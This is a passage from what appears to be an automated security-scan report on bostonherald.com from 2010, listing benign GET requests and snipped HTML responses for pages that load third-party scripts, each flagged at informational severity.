Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /entertainment/music/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:21:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 59475

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.52. http://bostonherald.com/entertainment/music/general/view/20101107guided_tour_sates_hard-core_fans/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/entertainment/music/general/view/20101107guided_tour_sates_hard-core_fans/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /entertainment/music/general/view/20101107guided_tour_sates_hard-core_fans/srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:40:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.53. http://bostonherald.com/entertainment/television/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/entertainment/television/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://api.zap2it.com/tvlistings/zcConnector.jsp?ap=ptg&v=2&aid=bostonher&zip=02118
http://blog.zap2it.com/ithappenedlastnight/zap2it-editorial-widget.js
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /entertainment/television/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:27:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 63062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.zap2it.com/tvlistings/zcConnector.jsp?ap=ptg&v=2&aid=bostonher&zip=02118"></script>
...[SNIP]...
</style>

<script type="text/JavaScript" src="http://blog.zap2it.com/ithappenedlastnight/zap2it-editorial-widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.54. http://bostonherald.com/entertainment/television/general/view/20101107dead_center_actor_lincoln_living_the_zombie_dream_on_amc_drama/srvc=home&position=7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/entertainment/television/general/view/20101107dead_center_actor_lincoln_living_the_zombie_dream_on_amc_drama/srvc=home&position=7

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /entertainment/television/general/view/20101107dead_center_actor_lincoln_living_the_zombie_dream_on_amc_drama/srvc=home&position=7 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:43:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.55. http://bostonherald.com/entertainment/television/general/view/20101107state_of_the_event_as_president_blair_underwood_stumps_for_nbc_drama/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/entertainment/television/general/view/20101107state_of_the_event_as_president_blair_underwood_stumps_for_nbc_drama/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /entertainment/television/general/view/20101107state_of_the_event_as_president_blair_underwood_stumps_for_nbc_drama/srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:44:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.56. http://bostonherald.com/entertainment/television/general/view/20101107watch_this/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/entertainment/television/general/view/20101107watch_this/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /entertainment/television/general/view/20101107watch_this/srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:46:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.57. http://bostonherald.com/entertainment/travel/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/entertainment/travel/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://q1digital.checkm8.com/adam/cm8adam_1_call.js

Request

GET /entertainment/travel/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:15:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 56004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

9.58. http://bostonherald.com/extras/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/extras/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /extras/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:59:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 36706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.59. http://bostonherald.com/homepage.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/homepage.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/carousel.js
http://cache.heraldinteractive.com/js/common.js?nocache=123
